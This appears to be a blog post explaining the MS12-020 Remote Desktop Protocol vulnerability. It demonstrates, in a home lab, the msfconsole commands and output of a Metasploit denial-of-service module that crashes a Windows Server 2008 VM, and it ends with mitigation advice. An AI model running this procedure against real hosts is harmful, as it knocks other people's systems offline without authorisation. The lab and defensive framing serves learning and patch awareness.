By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”
In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a “patch cycle” which require extensive testing prior to deployment.
- Linux (SolusOS)
- VirtualBox VM running Windows Server 2008 (with RDP enabled)
Launch msfconsole and follow the steps outlined here:
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 3389 yes The target port
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf auxiliary(ms12_020_maxchannelids) > run
[*] 192.168.2.10:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 – 210 bytes sent
[*] 192.168.2.10:3389 – Checking RDP status…
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed
RHOST = The vulnerable host that is running a vulnerable version of RDP
Mitigation:
- If you don’t need RDP open to the external world disable it
- Change the default port everyone know its 3389
- Enable network level authentication (NLA)
http://isc.sans.edu/diary.html?storyid=12808
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids
http://technet.microsoft.com/en-us/library/cc732713.aspx